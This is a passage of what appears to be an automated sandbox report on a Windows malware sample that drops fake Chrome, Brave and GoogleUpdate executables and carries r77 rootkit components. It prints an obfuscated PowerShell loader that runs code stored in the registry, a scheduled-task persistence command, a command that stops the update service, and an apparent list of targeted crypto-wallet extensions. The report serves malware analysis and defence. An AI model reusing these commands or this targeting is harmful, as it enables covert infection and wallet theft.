VdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Mutant created: \Sessions\1\BaseNamedObjects\PaAgAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4976:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_01
Source: C:\Users\user\AppData\Local\Google\brave.exe	Mutant created: \Sessions\1\BaseNamedObjects\OmBdAaAa__shmem3_winpthreads_tdm_
Source: C:\Windows\GoogleUpdate.exe	Mutant created: \Sessions\1\BaseNamedObjects\GoogleUpdate{825b2ad2-5778-421f-86b5-fbf0592aa463}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4644:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Mutant created: \Sessions\1\BaseNamedObjects\PaAgAaAa__eh_shmem3_gcc_tdm_
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\GoogleUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe, 00000025.00000000.393756713.0000000000E41000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 0000003D.00000002.578889899.000001CD149E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: powershell.exe, 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.537508242.000000014001C000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.535294108.000000014001C000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 00000044.00000000.554210864.00000254B29D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.630160818.000001CD2483C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: brave.exe, 00000006.00000002.458469655.000001AC13EF2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000039.00000000.455311066.00007FF670D4D000.00000002.00000001.01000000.00000000.sdmp, dialer.exe, 00000039.00000002.461723333.00007FF670D4D000.00000002.00000001.01000000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 0000003D.00000002.578889899.000001CD149E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.635145721.000001CD24AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.633336710.000001CD249D2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.533619282.0000000140000000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000041.00000000.529862178.0000000140000000.00000040.00000001.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_004088FD push ecx; ret	0_2_00408910
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Code function: 0_2_0041A31C push es; iretd	0_2_0041A332
Source: C:\Users\user\AppData\Local\Google\brave.exe	Code function: 6_2_00007FF652DE25C8 push rsi; retf FA26h	6_2_00007FF652DE25D2
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_004171DC push edx; mov dword ptr [esp], eax	43_2_00417677
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002BF807 push ecx; mov dword ptr [esp], eax	43_2_002BFF55
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C0B8E push edi; mov dword ptr [esp], eax	43_2_002C10A2
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C0B8E push edi; mov dword ptr [esp], eax	43_2_002C1168
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C0B8E push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_00419B98 push eax; mov dword ptr [esp], esi	43_2_00419C96
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1039 push edi; mov dword ptr [esp], eax	43_2_002C10A2
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1039 push edi; mov dword ptr [esp], eax	43_2_002C1168
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1039 push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C009B push ebx; mov dword ptr [esp], eax	43_2_002C0421
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C111B push edi; mov dword ptr [esp], eax	43_2_002C1168
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C111B push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1112 push edi; mov dword ptr [esp], eax	43_2_002C1168
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1112 push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1156 push edi; mov dword ptr [esp], eax	43_2_002C1168
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1156 push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C11AC push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C11CF push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_00403270 push eax; mov dword ptr [esp], esi	43_2_0040332B
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C121E push edi; mov dword ptr [esp], eax	43_2_002C1258
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002BB3B7 push edx; mov dword ptr [esp], 00000001h	43_2_002BB488
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002BE393 push es; ret	43_2_002BE39A

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_0040AA33 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_0040AA33

Source: brave.exe.2.dr	Static PE information: section name: .xdata
Source: updater.exe.6.dr	Static PE information: section name: .xdata
Source: 54A0.tmp.6.dr	Static PE information: section name: _RDATA
Source: 5528.tmp.67.dr	Static PE information: section name: .xdata

Source: fl.exe.2.dr	Static PE information: real checksum: 0x26e199 should be: 0x26db55
Source: brave.exe.2.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ee
Source: updater.exe.6.dr	Static PE information: real checksum: 0x2ce193 should be: 0x2c34ef
Source: 54A0.tmp.6.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: 5528.tmp.67.dr	Static PE information: real checksum: 0x43dd5 should be: 0x4912f
Source: 571D.tmp.67.dr	Static PE information: real checksum: 0x0 should be: 0x1e8db8
Source: ofg.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x1938e

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Google\chrome.exe

Executable created and started: C:\Windows\GoogleUpdate.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\chrome.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\fl.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\5528.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\ofg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File created: C:\Users\user\AppData\Local\Google\brave.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\brave.exe	File created: C:\Users\user\AppData\Local\Temp\54A0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\chrome.exe	File created: C:\Windows\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\571D.tmp	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\5528.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Google\chrome.exe	File created: C:\Windows\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\571D.tmp	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Google\ofg.exe

Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST

Source: C:\Windows\System32\dialer.exe

File created: C:\Windows\Tasks\dialersvc32.job

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 5128 base: 7B0005 value: E9 FB 99 94 76
Source: C:\Windows\GoogleUpdate.exe	Memory written: PID: 5128 base: 770F9A00 value: E9 0A 66 6B 89

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Google\brave.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\54A0.TMP

Source: C:\Windows\System32\dialer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
